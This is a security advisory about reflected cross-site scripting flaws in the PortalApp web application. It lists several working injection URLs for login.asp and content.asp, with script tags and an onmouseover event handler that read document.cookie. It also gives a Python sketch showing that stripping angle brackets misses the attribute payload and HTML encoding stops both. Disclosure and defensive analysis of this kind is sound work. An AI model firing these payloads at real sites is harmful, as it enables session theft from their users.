High-Tech Bridge advisory HTB22441
Jun 14, 2010 - 12:00 a.m.

Cross-site Scripting (XSS) Vulnerabilities in PortalApp

2010-06-14 00:00:00
High-Tech Bridge
www.htbridge.com

EPSS: 0.003 (percentile: 69.9%)

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in PortalApp which could be exploited to perform cross-site scripting attacks.

  1. Cross-site scripting (XSS) vulnerability in PortalApp
    1.1 The vulnerability exists due to an input sanitization error in multiple parameters in login.asp. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
    Exploitation examples:
    http://host/login.asp?user_name=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&password=&ret_page=
    http://host/login.asp?user_name=&password=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&ret_page=
    http://host/login.asp?user_name=&password=&ret_page=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
    http://host/login.asp?email=sd%40sd.df%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&search_btn=SEND&action=lookup&do_search=1
    1.2 The vulnerability exists due to an input sanitization error in the "keywords" parameter in content.asp. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
    Exploitation example:
    http://host/content.asp?CatId=&ContentType=&keywords=sd'"+style=position:absolute;left:0;top:0;width:100%25;height:100%25;+onmouseover=alert%28123%29+x&search=%3E&do_search=1
    This vulnerability was independently discovered by r3dm0v3 and was assigned CVE-2008-4612.
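
The two payload styles in the examples above behave differently under filtering: the content.asp value contains no angle brackets, so stripping `<` and `>` leaves its event handler in place, while HTML-encoding the value on output neutralizes both. The following Python sketch is an added example, not code from the advisory or from PortalApp; the reflection point (a double-quoted `value` attribute), the field name `q` and all function names are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote_plus

# Parameter values from the advisory's example URLs, URL-decoded here.
SCRIPT_VALUE = unquote_plus("%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E")
ATTR_VALUE = unquote_plus(
    "sd'\"+style=position:absolute;left:0;top:0;width:100%25;height:100%25;"
    "+onmouseover=alert%28123%29+x")

# Assumption: the value is echoed into a double-quoted attribute (hypothetical markup).
TEMPLATE = '<input type="text" name="q" value="{}">'

def render_raw(value):
    """No output handling at all (the behaviour the advisory describes)."""
    return TEMPLATE.format(value)

def render_strip_brackets(value):
    """Incomplete fix: removes only angle brackets."""
    return TEMPLATE.format(value.replace("<", "").replace(">", ""))

def render_encoded(value):
    """HTML-encode &, <, > and both quote characters before output."""
    return TEMPLATE.format(html.escape(value, quote=True))

class _Audit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = set()

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.add("<script>")
        # Event-handler attributes (onmouseover, onclick, ...) also run script.
        self.findings.update(name for name, _ in attrs if name.startswith("on"))

def active_content(markup):
    """Return the script tags and on* attributes an HTML parser sees in markup."""
    audit = _Audit()
    audit.feed(markup)
    audit.close()
    return audit.findings

if __name__ == "__main__":
    for render in (render_raw, render_strip_brackets, render_encoded):
        for value in (SCRIPT_VALUE, ATTR_VALUE):
            print(render.__name__, sorted(active_content(render(value))))
```
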
